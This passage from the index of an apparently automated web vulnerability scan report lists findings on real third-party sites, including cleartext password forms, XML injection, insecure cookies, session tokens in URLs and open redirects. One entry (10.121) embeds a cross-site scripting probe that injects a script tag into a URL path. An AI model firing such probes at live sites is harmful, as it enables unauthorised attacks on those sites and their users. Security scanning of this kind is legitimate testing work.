5.15. http://mm.chitika.net/crossdomain.xml

5.16. http://s46.sitemeter.com/crossdomain.xml

5.17. http://static.ak.fbcdn.net/crossdomain.xml

5.18. http://api.twitter.com/crossdomain.xml

5.19. http://home.compete.com.edgesuite.net/crossdomain.xml

6. Silverlight cross-domain policy

7. Cleartext submission of password

7.1. http://developer.quova.com/member/register

7.2. http://www.projecthoneypot.org/account_login.php

7.3. http://www.topwebhosts.org/

7.4. http://www.topwebhosts.org/showcase/reseller-hosting.php

7.5. http://www.topwebhosts.org/tools/ip-locator.php

7.6. http://www.wilderssecurity.com/showthread.php

8. XML injection

8.1. http://pixel.alexametrics.com/atrk.gif [REST URL parameter 1]

8.2. http://platform.twitter.com/widgets/tweet_button.html [REST URL parameter 1]

8.3. http://platform.twitter.com/widgets/tweet_button.html [REST URL parameter 2]

8.4. http://s4.uicdn.net/ui/4b6c45598d3c794c81dd84991480284c-favicon.ico [REST URL parameter 1]

8.5. http://s4.uicdn.net/ui/4b6c45598d3c794c81dd84991480284c-favicon.ico [REST URL parameter 2]

8.6. http://www.robtex.com/ext/ads/buchban [REST URL parameter 1]

8.7. http://www.robtex.com/ext/ads/buchscr [REST URL parameter 1]

9. SSL cookie without secure flag set

9.1. https://buy.quova.com/

9.2. https://store.port80software.com/cart/

9.3. https://support.sentrigo.com/

9.4. https://www.port80software.com/images/NaN

9.5. https://order.1and1.com/xml/order/AboutUs

9.6. https://order.1and1.com/xml/order/CloudDynamicServer

9.7. https://order.1and1.com/xml/order/DomaininfoMove

9.8. https://order.1and1.com/xml/order/Eshops

9.9. https://order.1and1.com/xml/order/Gtc

9.10. https://order.1and1.com/xml/order/Home

9.11. https://order.1and1.com/xml/order/Hosting

9.12. https://order.1and1.com/xml/order/Instant

9.13. https://order.1and1.com/xml/order/Jumpto

9.14. https://order.1and1.com/xml/order/LocalSubmission

9.15. https://order.1and1.com/xml/order/Mail

9.16. https://order.1and1.com/xml/order/MailInstantMail

9.17. https://order.1and1.com/xml/order/MailXchange

9.18. https://order.1and1.com/xml/order/MicrosoftExchange

9.19. https://order.1and1.com/xml/order/MsHosting

9.20. https://order.1and1.com/xml/order/PrivacyPolicy

9.21. https://order.1and1.com/xml/order/Server

9.22. https://order.1and1.com/xml/order/ServerPremium

9.23. https://order.1and1.com/xml/order/Sharepoint

9.24. https://order.1and1.com/xml/order/TellAFriend

9.25. https://order.1and1.com/xml/order/VirtualServer

9.26. https://order.1and1.com/xml/order/addon

9.27. https://order.1and1.com/xml/order/addon

9.28. https://order.1and1.com/xml/order/costs

9.29. https://order.1and1.com/xml/order/costs

9.30. https://order.1and1.com/xml/order/domaincheck

9.31. https://order.1and1.com/xml/order/domaincheck

9.32. https://order.1and1.com/xml/order/popupBillingCycle

9.33. https://order.1and1.com/xml/order/popupDomainPrices

9.34. https://order.1and1.com/xml/order/popupInternationalCustomers

9.35. https://order.1and1.com/xml/order/popupSymantec

9.36. https://order.1and1.com/xml/order/terms

9.37. https://www.port80software.com/favicon.ico

9.38. https://www.port80software.com/images/N_support.gif

10. Session token in URL

10.1. http://04e77fc8cc74396e5f52b887dd10171a-quova13006323844d861340674da.assets.truvie.com/spacer.gif

10.2. http://04e77fc8cc74396e5f52b887dd10171a-quova13006326914d86147306493.assets.truvie.com/spacer.gif

10.3. http://04e77fc8cc74396e5f52b887dd10171a-quova13006327584d8614b62a809.assets.truvie.com/spacer.gif

10.4. http://arc.help.yahoo.com/error.gif

10.5. http://assets.truvie.com/button.js

10.6. https://extranet.quova.com/Portal/user/Home.view

10.7. http://l.sharethis.com/pview

10.8. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate

10.9. http://maps.googleapis.com/maps/api/js/StaticMapService.GetMapImage

10.10. http://maps.googleapis.com/maps/api/js/ViewportInfoService.GetViewportInfo

10.11. http://mt1.googleapis.com/mapslt/ft

10.12. http://order.1and1.com/links

10.13. http://order.1and1.com/xml/order

10.14. http://order.1and1.com/xml/order/AboutUs

10.15. http://order.1and1.com/xml/order/CloudDynamicServer

10.16. http://order.1and1.com/xml/order/CloudDynamicServer

10.17. http://order.1and1.com/xml/order/Connectivity

10.18. http://order.1and1.com/xml/order/Connectivity

10.19. http://order.1and1.com/xml/order/Contact

10.20. http://order.1and1.com/xml/order/Customers

10.21. http://order.1and1.com/xml/order/Customers

10.22. http://order.1and1.com/xml/order/DataCenter

10.23. http://order.1and1.com/xml/order/DataCenter

10.24. http://order.1and1.com/xml/order/Domaininfo

10.25. http://order.1and1.com/xml/order/DomaininfoAll

10.26. http://order.1and1.com/xml/order/DomaininfoAll

10.27. http://order.1and1.com/xml/order/DomaininfoDns

10.28. http://order.1and1.com/xml/order/DomaininfoDns

10.29. http://order.1and1.com/xml/order/DomaininfoMobi

10.30. http://order.1and1.com/xml/order/DomaininfoMobi

10.31. http://order.1and1.com/xml/order/DomaininfoMove

10.32. http://order.1and1.com/xml/order/DomaininfoOrg

10.33. http://order.1and1.com/xml/order/DomaininfoOrg

10.34. http://order.1and1.com/xml/order/DomaininfoPdr

10.35. http://order.1and1.com/xml/order/DomaininfoPdr

10.36. http://order.1and1.com/xml/order/DomaininfoPricelist

10.37. http://order.1and1.com/xml/order/DomaininfoPricelist

10.38. http://order.1and1.com/xml/order/Eshops

10.39. http://order.1and1.com/xml/order/Facts

10.40. http://order.1and1.com/xml/order/Facts

10.41. http://order.1and1.com/xml/order/FeatureCommunicationToolsChat

10.42. http://order.1and1.com/xml/order/FeatureCommunicationToolsChat

10.43. http://order.1and1.com/xml/order/FeatureCommunicationToolsDialogue

10.44. http://order.1and1.com/xml/order/FeatureCommunicationToolsMerchandise

10.45. http://order.1and1.com/xml/order/FeatureCommunicationToolsNewsletter

10.46. http://order.1and1.com/xml/order/FeatureControlCenter

10.47. http://order.1and1.com/xml/order/FeatureDatabaseAccess

10.48. http://order.1and1.com/xml/order/FeatureDatabaseDatabase

10.49. http://order.1and1.com/xml/order/FeatureDatabaseMssql

10.50. http://order.1and1.com/xml/order/FeatureDomainDns

10.51. http://order.1and1.com/xml/order/FeatureDomainDomains

10.52. http://order.1and1.com/xml/order/FeatureDomainPdr

10.53. http://order.1and1.com/xml/order/FeatureDreamweaver

10.54. http://order.1and1.com/xml/order/FeatureEmailEmail

10.55. http://order.1and1.com/xml/order/FeatureEmailVirusscan

10.56. http://order.1and1.com/xml/order/FeatureEmailWebmail

10.57. http://order.1and1.com/xml/order/FeatureFtpBackup

10.58. http://order.1and1.com/xml/order/FeatureGuaranteeMoneyback

10.59. http://order.1and1.com/xml/order/FeatureMarketingCtrCitysearch

10.60. http://order.1and1.com/xml/order/FeatureMarketingCtrGoogleAdWords

10.61. http://order.1and1.com/xml/order/FeatureMarketingCtrSesub

10.62. http://order.1and1.com/xml/order/FeatureMarketingCtrStat

10.63. http://order.1and1.com/xml/order/FeatureParallelsPlesk

10.64. http://order.1and1.com/xml/order/FeatureParallelsSB

10.65. http://order.1and1.com/xml/order/FeatureSecurityCertificate

10.66. http://order.1and1.com/xml/order/FeatureServerDedOsLinux

10.67. http://order.1and1.com/xml/order/FeatureServerDedOsLinuxOpt

10.68. http://order.1and1.com/xml/order/FeatureServerDedOsWindows

10.69. http://order.1and1.com/xml/order/FeatureServerDedOsWindowsOpt

10.70. http://order.1and1.com/xml/order/FeatureServerFirewall

10.71. http://order.1and1.com/xml/order/FeatureServerHarddrive

10.72. http://order.1and1.com/xml/order/FeatureServerMonitoring

10.73. http://order.1and1.com/xml/order/FeatureServerMonitoringCloud

10.74. http://order.1and1.com/xml/order/FeatureServerProcessor

10.75. http://order.1and1.com/xml/order/FeatureServerRecovery

10.76. http://order.1and1.com/xml/order/FeatureServerSsl

10.77. http://order.1and1.com/xml/order/FeatureServerVpsOsLinux

10.78. http://order.1and1.com/xml/order/FeatureServerVpsOsWindows

10.79. http://order.1and1.com/xml/order/FeatureSite-buildingAsp

10.80. http://order.1and1.com/xml/order/FeatureSite-buildingBlog

10.81. http://order.1and1.com/xml/order/FeatureSite-buildingBlog

10.82. http://order.1and1.com/xml/order/FeatureSite-buildingCgi

10.83. http://order.1and1.com/xml/order/FeatureSite-buildingCnba

10.84. http://order.1and1.com/xml/order/FeatureSite-buildingCnba

10.85. http://order.1and1.com/xml/order/FeatureSite-buildingContentmoduls

10.86. http://order.1and1.com/xml/order/FeatureSite-buildingDriving

10.87. http://order.1and1.com/xml/order/FeatureSite-buildingDsc

10.88. http://order.1and1.com/xml/order/FeatureSite-buildingElements

10.89. http://order.1and1.com/xml/order/FeatureSite-buildingMailinglist

10.90. http://order.1and1.com/xml/order/FeatureSite-buildingMap

10.91. http://order.1and1.com/xml/order/FeatureSite-buildingNet

10.92. http://order.1and1.com/xml/order/FeatureSite-buildingPhotogallery

10.93. http://order.1and1.com/xml/order/FeatureSite-buildingRss

10.94. http://order.1and1.com/xml/order/FeatureSite-buildingWsb

10.95. http://order.1and1.com/xml/order/FeatureToolsRatepoint

10.96. http://order.1and1.com/xml/order/FeatureWebdesignIstock

10.97. http://order.1and1.com/xml/order/FeatureWebspaceExplorer

10.98. http://order.1and1.com/xml/order/FeatureWebspaceExplorer

10.99. http://order.1and1.com/xml/order/FirstWebsite

10.100. http://order.1and1.com/xml/order/Gtc

10.101. http://order.1and1.com/xml/order/History

10.102. http://order.1and1.com/xml/order/History

10.103. http://order.1and1.com/xml/order/Home

10.104. http://order.1and1.com/xml/order/Home

10.105. http://order.1and1.com/xml/order/Hosting

10.106. http://order.1and1.com/xml/order/Hosting

10.107. http://order.1and1.com/xml/order/Instant

10.108. http://order.1and1.com/xml/order/International

10.109. http://order.1and1.com/xml/order/Jumpto

10.110. http://order.1and1.com/xml/order/LocalSubmission

10.111. http://order.1and1.com/xml/order/Mail

10.112. http://order.1and1.com/xml/order/Mail

10.113. http://order.1and1.com/xml/order/MailInstantMail

10.114. http://order.1and1.com/xml/order/MailXchange

10.115. http://order.1and1.com/xml/order/MicrosoftExchange

10.116. http://order.1and1.com/xml/order/Mission

10.117. http://order.1and1.com/xml/order/Mission

10.118. http://order.1and1.com/xml/order/Moneyback

10.119. http://order.1and1.com/xml/order/MsHosting

10.120. http://order.1and1.com/xml/order/MsHosting

10.121. http://order.1and1.com/xml/order/MsHosting9d4af%3C/ScRiPt%20%3E%3CScRiPt%3Ealert(String.fromCharCode(88,83,83))%3C/ScRiPt%3E542f10c1a1e

10.122. http://order.1and1.com/xml/order/News

10.123. http://order.1and1.com/xml/order/News

10.124. http://order.1and1.com/xml/order/PrivacyPolicy

10.125. http://order.1and1.com/xml/order/Server

10.126. http://order.1and1.com/xml/order/Server

10.127. http://order.1and1.com/xml/order/ServerPremium

10.128. http://order.1and1.com/xml/order/Service

10.129. http://order.1and1.com/xml/order/Sharepoint

10.130. http://order.1and1.com/xml/order/StrategicPartners

10.131. http://order.1and1.com/xml/order/StrategicPartners

10.132. http://order.1and1.com/xml/order/TcSpecialOffers

10.133. http://order.1and1.com/xml/order/TellAFriend

10.134. http://order.1and1.com/xml/order/VirtualServer

10.135. http://order.1and1.com/xml/order/VirtualServer

10.136. http://order.1and1.com/xml/order/VirtualServerL

10.137. http://order.1and1.com/xml/order/VirtualServerL

10.138. http://order.1and1.com/xml/order/VirtualServerXL

10.139. http://order.1and1.com/xml/order/VirtualServerXXL

10.140. http://order.1and1.com/xml/order/WhyOneandone

10.141. http://order.1and1.com/xml/order/WhyOneandone

10.142. http://order.1and1.com/xml/order/a

10.143. http://order.1and1.com/xml/order/addon

10.144. http://order.1and1.com/xml/order/costs

10.145. http://order.1and1.com/xml/order/domaincheck

10.146. http://order.1and1.com/xml/order/domaincheck

10.147. http://order.1and1.com/xml/order/eshopupselling

10.148. http://order.1and1.com/xml/order/eshopupselling

10.149. http://order.1and1.com/xml/order/popupDomainPrices

10.150. http://order.1and1.com/xml/order/popupDomainPrices

10.151. http://order.1and1.com/xml/order/popupGreenPower

10.152. http://order.1and1.com/xml/order/popupNetviewer

10.153. http://order.1and1.com/xml/order/popupNetviewer

10.154. http://order.1and1.com/xml/order/popupPayPalInfo

10.155. http://order.1and1.com/xml/order/popupServerOsCds

10.156. http://order.1and1.com/xml/order/popupServerOsVps

10.157. http://order.1and1.com/xml/order/popupTcGoogleAdwords

10.158. http://order.1and1.com/xml/order/popupWebsiteMagazine

10.159. http://order.1and1.com/xml/order/sitedesign

10.160. http://order.1and1.com/xml/order/tariffselect

10.161. http://order.1and1.com/xml/webservice/VDSPriceService

10.162. https://order.1and1.com/xml/order/AboutUs

10.163. https://order.1and1.com/xml/order/CloudDynamicServer

10.164. https://order.1and1.com/xml/order/DomaininfoMove

10.165. https://order.1and1.com/xml/order/Eshops

10.166. https://order.1and1.com/xml/order/Gtc

10.167. https://order.1and1.com/xml/order/Home

10.168. https://order.1and1.com/xml/order/Hosting

10.169. https://order.1and1.com/xml/order/Instant

10.170. https://order.1and1.com/xml/order/Jumpto

10.171. https://order.1and1.com/xml/order/LocalSubmission

10.172. https://order.1and1.com/xml/order/Mail

10.173. https://order.1and1.com/xml/order/MailInstantMail

10.174. https://order.1and1.com/xml/order/MailXchange

10.175. https://order.1and1.com/xml/order/MicrosoftExchange

10.176. https://order.1and1.com/xml/order/MsHosting

10.177. https://order.1and1.com/xml/order/PrivacyPolicy

10.178. https://order.1and1.com/xml/order/Server

10.179. https://order.1and1.com/xml/order/ServerPremium

10.180. https://order.1and1.com/xml/order/Sharepoint

10.181. https://order.1and1.com/xml/order/TellAFriend

10.182. https://order.1and1.com/xml/order/VirtualServer

10.183. https://order.1and1.com/xml/order/addon

10.184. https://order.1and1.com/xml/order/addon

10.185. https://order.1and1.com/xml/order/costs

10.186. https://order.1and1.com/xml/order/costs

10.187. https://order.1and1.com/xml/order/domaincheck

10.188. https://order.1and1.com/xml/order/domaincheck

10.189. https://order.1and1.com/xml/order/popupBillingCycle

10.190. https://order.1and1.com/xml/order/popupDomainPrices

10.191. https://order.1and1.com/xml/order/popupInternationalCustomers

10.192. https://order.1and1.com/xml/order/popupSymantec

10.193. https://order.1and1.com/xml/order/terms

10.194. http://pixel.1und1.de/JavaScriptErrorCollector/

10.195. http://pixel.alexametrics.com/atrk.gif

10.196. http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com/ps/ifr

10.197. http://siteexplorer.search.yahoo.com/search

10.198. http://tracking.dc-storm.com/xdom/savecook.aspx

10.199. http://www.blogger.com/comment-iframe.g

10.200. http://www.facebook.com/extern/login_status.php

10.201. http://www.google.com/realtimejs

10.202. http://www.quova.com/

10.203. http://www.quova.com/what/ip-repository/

10.204. http://www.united-domains.de/

10.205. http://www.united-internet.de/

10.206. http://www.united-internet.de/deref

11. Open redirection

11.1. http://0.gravatar.com/avatar/05c31fdabea706f7d022af955e9ff5a4 [d parameter]

11.2. http://0.gravatar.com/avatar/0da88781b5a3de1a4116fb534bd0e11e [d parameter]

11.3. http://0.gravatar.com/avatar/25654a0c6870048ad52e1968d819afc2 [d parameter]

11.4. http://0.gravatar.com/avatar/c99eb8294b0183625f2a152e1dbf892e [d parameter]

11.5. http://0.gravatar.com/avatar/eb1f072bca62447afb118f21047a2df4 [d parameter]

11.6. http://1.gravatar.com/avatar/1cd0daf11fcb5ac18ee518af6fa1d6d6 [d parameter]

11.7. http://1.gravatar.com/avatar/3fe290c6840761e2d34d2310a5824d03 [d parameter]

11.8. http://1.gravatar.com/avatar/715bf85afef407f952570175e72ab792 [d parameter]

11.9. http://1.gravatar.com/avatar/74df42c2c6a98e706711ab392a1efe49 [d parameter]

11.10. http://1.gravatar.com/avatar/9da8187c1924785a3f4893c076f69614 [d parameter]

11.11. http://1.gravatar.com/avatar/ba0078c95afc9b499b51d0278335461f [d parameter]

11.12. http://1.gravatar.com/avatar/f7f9835ec7838422dc3c28fe3bcb64aa [d parameter]

11.13. http://1.gravatar.com/avatar/fc0644185baa526963289caeb5909000 [d parameter]

12. Cookie scoped to parent domain

12.1. http://ads.newtention.net/ads

12.2. http://api.twitter.com/1/statuses/user_timeline.json

12.3. http://www.appliedtrust.com/

12.4. http://www.sentrigo.com/

12.5. http://www.terabitsystems.com/

12.6. http://www.topwebhosts.org/tools/ip-locator.php

12.7. http://04e77fc8cc74396e5f52b887dd10171a-quova13006323844d861340674da.assets.truvie.com/spacer.gif

12.8. http://04e77fc8cc74396e5f52b887dd10171a-quova13006326914d86147306493.assets.truvie.com/spacer.gif

12.9. http://04e77fc8cc74396e5f52b887dd10171a-quova13006327584d8614b62a809.assets.truvie.com/spacer.gif

12.10. http://a.tribalfusion.com/j.ad

12.11. http://adclient.uimserv.net/js.ng/special=rectangle&site=gmx§ion=gmx/homepage/start/de/&category=homepage®ion=de&cc=de&pageview=homepage&viewwidth=0&viewheight=0&tagID=site/1/&owner=uim/coop/&owner=uim/&owner=oms/&owner=uim/shopping/&owner=uim/mcb/&specialtype=&adsize=300x250&adsize=300x120&adsize=300x600&tile=450179178966209339252557256259&transactionID=450179178966209339252557256259

12.12. http://adopt.imiclk.com/emb/q

12.13. http://adopt.imiclk.com/emb/q

12.14. http://adopt.imiclk.com/emb/q

12.15. http://ads.adviva.net/track/v=4

12.16. http://ads.atomex.net/cgi-bin/adserver.fcgi/ad

12.17. http://amch.questionmarket.com/adsc/d862189/4/200198554191/decide.php

12.18. http://as.casalemedia.com/sd

12.19. http://b.scorecardresearch.com/b

12.20. http://badge.facebook.com/badge/241276949072.3003.1885138881.png

12.21. http://bs.serving-sys.com/BurstingPipe/adServer.bs

12.22. http://c.statcounter.com/t.php

12.23. http://cf.addthis.com/red/p.json

12.24. http://clients1.google.com/webpagethumbnail

12.25. http://d7.zedo.com/bar/v16-403/d3/jsc/fmr.js

12.26. http://d7.zedo.com/bar/v16-403/d3/jsc/gl.js

12.27. http://data.aggregateknowledge.com/pixel!t=650!

12.28. http://dg.specificclick.net/

12.29. http://dms.technoratimedia.com/setter.cfm

12.30. http://ds.addthis.com/red/psi/sites/seo101.co/p.json

12.31. http://gmx.ivwbox.de/blank.gif

12.32. http://gmx.ivwbox.de/cgi-bin/ivw/CP/264

12.33. http://ib.adnxs.com/seg

12.34. http://ib.adnxs.com/tt

12.35. http://id.google.com/verify/EAAAAEiBdPgibrDRcGdFqo-uOhI.gif

12.36. http://id.google.com/verify/EAAAAFCUEgBSN9et9jWbiKxbFIo.gif

12.37. http://id.google.com/verify/EAAAAISMuj8URePKotZY4LmsqfQ.gif

12.38. http://id.google.com/verify/EAAAAMw3sqwlkp160WvRmcJLEnQ.gif

12.39. http://images.apple.com/global/nav/styles/navigation.css

12.40. http://images.apple.com/global/scripts/ac_media.js

12.41. http://images.apple.com/global/scripts/apple_core.js

12.42. http://images.apple.com/global/scripts/browserdetect.js

12.43. http://images.apple.com/global/scripts/lib/event_mixins.js

12.44. http://images.apple.com/global/scripts/lib/prototype.js

12.45. http://images.apple.com/global/scripts/lib/scriptaculous.js

12.46. http://images.apple.com/global/scripts/overlay_panel.js

12.47. http://images.apple.com/global/scripts/overlay_panel_screen.js

12.48. http://images.apple.com/global/scripts/search_decorator.js

12.49. http://images.apple.com/global/scripts/swap_view.js

12.50. http://images.apple.com/global/scripts/view_master_tracker.js

12.51. http://images.apple.com/global/styles/ac_media.css

12.52. http://images.apple.com/global/styles/overlay.css

12.53. http://images.apple.com/ipod/scripts/overlay.js

12.54. http://images.apple.com/ipod/styles/overlay.css

12.55. http://imp.fetchback.com/serve/fb/adtag.js

12.56. http://imp.fetchback.com/serve/fb/hover

12.57. http://imp.fetchback.com/serve/fb/imp

12.58. http://maps.google.com/maps

12.59. http://media.fastclick.net/w/get.media

12.60. http://odb.outbrain.com/utils/get

12.61. http://pixel.33across.com/ps/

12.62. http://pixel.rubiconproject.com/tap.php

12.63. http://pixelbox.uimserv.net/cgi-bin/gmx/CP/264

12.64. http://pixelbox.uimserv.net/cgi-bin/webde/CP/264

12.65. http://r.turn.com/r/beacon

12.66. http://rover.ebay.com/ar/1/73344/4

12.67. http://safebrowsing.clients.google.com/safebrowsing/downloads

12.68. http://safebrowsing.clients.google.com/safebrowsing/gethash

12.69. http://shots.snap.com/snap_shots.js

12.70. http://t.invitemedia.com/track_imp

12.71. http://tags.bluekai.com/site/3085

12.72. http://tags.bluekai.com/site/357

12.73. http://translate.google.com/translate_a/element.js

12.74. http://va.px.invitemedia.com/pixel

12.75. http://vt.imiclk.com/cgi/vtc.cgi

12.76. http://vt.imiclk.com/cgi/vtc.cgi

12.77. http://webdessl.ivwbox.de/blank.gif

12.78. http://webdessl.ivwbox.de/cgi-bin/ivw/CP/264

12.79. http://www.alexa.com/site/clickstream

12.80. http://www.alexa.com/site/trafficstats

12.81. http://www.alexa.com/siteinfo/xss.cx

12.82. http://www.blogger.com/comment-iframe.g

12.83. http://www.burstbeacon.com/view/90916/12285/177733/308557/3000/3111E3FF/16lnk0k1bqnmuj/

12.84. http://www.burstbeacon.com/view/90916/12285/177733/308561/3000/FF64E799/16lnk0k1bqnmuj/

12.85. http://www.burstbeacon.com/view/90916/27881/176307/305392/3000/1791BAA1/16lnk0k1bqnmuj/

12.86. http://www.burstnet.com/cgi-bin/ads/ad16597a.cgi/v=2.3S/sz=300X250A%7C300x600A/44641/RETURN-CODE/JS/

12.87. http://www.burstnet.com/enlightn/4623//042A/

12.88. http://www.facebook.com/campaign/impression.php

12.89. http://www.google.com/gen_204

12.90. http://www.google.com/mbd

12.91. http://www.google.com/realtimejs

12.92. http://www.google.com/realtimepts

12.93. http://www.google.com/search

12.94. http://www.linkedin.com/company/api/recommendation/count

12.95. http://www.s2d6.com/x/

12.96. http://www.topwebhosts.org/

12.97. http://www.unspam.com/

12.98. http://www.wilderssecurity.com/showthread.php

13. Cookie without HttpOnly flag set

13.1. http://ads.adxpose.com/ads/ads.js

13.2. http://ads.newtention.net/ads

13.3. http://event.adxpose.com/event.flow

13.4. https://extranet.quova.com/Portal/

13.5. http://seo101.co/xss.cx

13.6. https://store.port80software.com/cart/

13.7. https://support.sentrigo.com/

13.8. http://websiteworth.co/www.xss.cx

13.9. http://whois.arin.net/rest/net/NET-65-49-14-0-1/pft

13.10. http://www.alexa.com/siteinfo/xss.cx

13.11. http://www.appliedtrust.com/

13.12. http://www.fasthosts.co.uk/

13.13. http://www.linkedin.com/company/api/recommendation/count

13.14. http://www.phoenixads.co.in/delivery/ads.asp

13.15. http://www.port80software.com/

13.16. http://www.port80software.com/NaN

13.17. http://www.port80software.com/ServerDefenderVP

13.18. http://www.port80software.com/products/serverdefender/

13.19. https://www.port80software.com/images/NaN

13.20. http://www.quicktolead.com/manager.asp

13.21. http://www.sentrigo.com/

13.22. http://www.terabitsystems.com/

13.23. http://www.topwebhosts.org/tools/ip-locator.php

13.24. http://www.townsendassets.com/

13.25. http://www.united-domains.de/

13.26. http://www.united-internet.de/

13.27. http://04e77fc8cc74396e5f52b887dd10171a-quova13006323844d861340674da.assets.truvie.com/spacer.gif

13.28. http://04e77fc8cc74396e5f52b887dd10171a-quova13006326914d86147306493.assets.truvie.com/spacer.gif

13.29. http://04e77fc8cc74396e5f52b887dd10171a-quova13006327584d8614b62a809.assets.truvie.com/spacer.gif

13.30. http://a.tribalfusion.com/j.ad

13.31. http://ad.epochtimes.com/s1/adframe.php

13.32. http://ad.epochtimes.com/s1/www/delivery/afr.php

13.33. http://ad.epochtimes.com/s1/www/delivery/afr.php

13.34. http://ad.epochtimes.com/s1/www/delivery/lg.php

13.35. http://ad.yieldmanager.com/iframe3

13.36. http://ad.yieldmanager.com/imp

13.37. http://ad.yieldmanager.com/pixel

13.38. http://ad.yieldmanager.com/unpixel

13.39. http://adclient.uimserv.net/js.ng/special=rectangle&site=gmx§ion=gmx/homepage/start/de/&category=homepage®ion=de&cc=de&pageview=homepage&viewwidth=0&viewheight=0&tagID=site/1/&owner=uim/coop/&owner=uim/&owner=oms/&owner=uim/shopping/&owner=uim/mcb/&specialtype=&adsize=300x250&adsize=300x120&adsize=300x600&tile=450179178966209339252557256259&transactionID=450179178966209339252557256259

13.40. http://adopt.imiclk.com/emb/q

13.41. http://adopt.imiclk.com/emb/q

13.42. http://adopt.imiclk.com/emb/q

13.43. http://ads.adviva.net/track/v=4

13.44. http://ads.atomex.net/cgi-bin/adserver.fcgi/ad

13.45. http://ads.webtrafficexchange.com/www/delivery/ajs.php

13.46. http://ads.webtrafficexchange.com/www/delivery/lg.php

13.47. http://ads1.tyroo.com/addyn/3.0/1067/3134846/0/170/ADTECH

13.48. http://adsfac.us/ag.asp

13.49. http://amch.questionmarket.com/adsc/d862189/4/200198554191/decide.php

13.50. http://api.twitter.com/1/statuses/user_timeline.json

13.51. http://as.casalemedia.com/sd

13.52. http://b.scorecardresearch.com/b

13.53. http://badge.facebook.com/badge/241276949072.3003.1885138881.png

13.54. http://bs.serving-sys.com/BurstingPipe/adServer.bs

13.55. http://bs.serving-sys.com/BurstingPipe/adServer.bs

13.56. http://c.statcounter.com/t.php

13.57. http://cf.addthis.com/red/p.json

13.58. http://clicktracker.pint.com/PINT_.js

13.59. http://clicktracker.pint.com/server.php

13.60. http://clients1.google.com/webpagethumbnail

13.61. http://d7.zedo.com/bar/v16-403/d3/jsc/fmr.js

13.62. http://d7.zedo.com/bar/v16-403/d3/jsc/gl.js

13.63. http://data.aggregateknowledge.com/pixel!t=650!

13.64. http://data.cmcore.com/imp

13.65. http://dg.specificclick.net/

13.66. http://dms.technoratimedia.com/setter.cfm

13.67. http://ds.addthis.com/red/psi/sites/seo101.co/p.json

13.68. http://gmx.ivwbox.de/blank.gif

13.69. http://gmx.ivwbox.de/cgi-bin/ivw/CP/264

13.70. http://images.apple.com/global/nav/styles/navigation.css

13.71. http://images.apple.com/global/scripts/ac_media.js

13.72. http://images.apple.com/global/scripts/apple_core.js

13.73. http://images.apple.com/global/scripts/browserdetect.js

13.74. http://images.apple.com/global/scripts/lib/event_mixins.js

13.75. http://images.apple.com/global/scripts/lib/prototype.js

13.76. http://images.apple.com/global/scripts/lib/scriptaculous.js

13.77. http://images.apple.com/global/scripts/overlay_panel.js

13.78. http://images.apple.com/global/scripts/overlay_panel_screen.js

13.79. http://images.apple.com/global/scripts/search_decorator.js

13.80. http://images.apple.com/global/scripts/swap_view.js

13.81. http://images.apple.com/global/scripts/view_master_tracker.js

13.82. http://images.apple.com/global/styles/ac_media.css

13.83. http://images.apple.com/global/styles/overlay.css

13.84. http://images.apple.com/ipod/scripts/overlay.js

13.85. http://images.apple.com/ipod/styles/overlay.css

13.86. http://imp.fetchback.com/serve/fb/adtag.js

13.87. http://imp.fetchback.com/serve/fb/hover

13.88. http://imp.fetchback.com/serve/fb/imp

13.89. http://maps.google.com/maps

13.90. http://media.fastclick.net/w/get.media

13.91. http://mm.chitika.net/minimall

13.92. http://odb.outbrain.com/utils/get

13.93. http://order.1and1.com/xml/order

13.94. http://order.1and1.com/xml/order

13.95. http://order.1and1.com/xml/order/AboutUs

13.96. http://order.1and1.com/xml/order/AboutUs

13.97. http://order.1and1.com/xml/order/CloudDynamicServer

13.98. http://order.1and1.com/xml/order/CloudDynamicServer

13.99. http://order.1and1.com/xml/order/Connectivity

13.100. http://order.1and1.com/xml/order/Connectivity

13.101. http://order.1and1.com/xml/order/Contact

13.102. http://order.1and1.com/xml/order/Contact

13.103. http://order.1and1.com/xml/order/Customers

13.104. http://order.1and1.com/xml/order/Customers

13.105. http://order.1and1.com/xml/order/DataCenter

13.106. http://order.1and1.com/xml/order/DataCenter

13.107. http://order.1and1.com/xml/order/Domaininfo

13.108. http://order.1and1.com/xml/order/Domaininfo

13.109. http://order.1and1.com/xml/order/DomaininfoAll

13.110. http://order.1and1.com/xml/order/DomaininfoAll

13.111. http://order.1and1.com/xml/order/DomaininfoDns

13.112. http://order.1and1.com/xml/order/DomaininfoDns

13.113. http://order.1and1.com/xml/order/DomaininfoMobi

13.114. http://order.1and1.com/xml/order/DomaininfoMobi

13.115. http://order.1and1.com/xml/order/DomaininfoMove

13.116. http://order.1and1.com/xml/order/DomaininfoMove

13.117. http://order.1and1.com/xml/order/DomaininfoOrg

13.118. http://order.1and1.com/xml/order/DomaininfoOrg

13.119. http://order.1and1.com/xml/order/DomaininfoPdr

13.120. http://order.1and1.com/xml/order/DomaininfoPdr

13.121. http://order.1and1.com/xml/order/DomaininfoPricelist

13.122. http://order.1and1.com/xml/order/DomaininfoPricelist

13.123. http://order.1and1.com/xml/order/Eshops

13.124. http://order.1and1.com/xml/order/Eshops

13.125. http://order.1and1.com/xml/order/Facts

13.126. http://order.1and1.com/xml/order/Facts

13.127. http://order.1and1.com/xml/order/FeatureCommunicationToolsChat

13.128. http://order.1and1.com/xml/order/FeatureCommunicationToolsChat

13.129. http://order.1and1.com/xml/order/FeatureCommunicationToolsDialogue

13.130. http://order.1and1.com/xml/order/FeatureCommunicationToolsDialogue

13.131. http://order.1and1.com/xml/order/FeatureCommunicationToolsMerchandise

13.132. http://order.1and1.com/xml/order/FeatureCommunicationToolsMerchandise

13.133. http://order.1and1.com/xml/order/FeatureCommunicationToolsNewsletter

13.134. http://order.1and1.com/xml/order/FeatureCommunicationToolsNewsletter

13.135. http://order.1and1.com/xml/order/FeatureControlCenter

13.136. http://order.1and1.com/xml/order/FeatureControlCenter

13.137. http://order.1and1.com/xml/order/FeatureDatabaseAccess

13.138. http://order.1and1.com/xml/order/FeatureDatabaseDatabase

13.139. http://order.1and1.com/xml/order/FeatureDatabaseDatabase

13.140. http://order.1and1.com/xml/order/FeatureDatabaseMssql

13.141. http://order.1and1.com/xml/order/FeatureDomainDns

13.142. http://order.1and1.com/xml/order/FeatureDomainDns

13.143. http://order.1and1.com/xml/order/FeatureDomainDomains

13.144. http://order.1and1.com/xml/order/FeatureDomainDomains

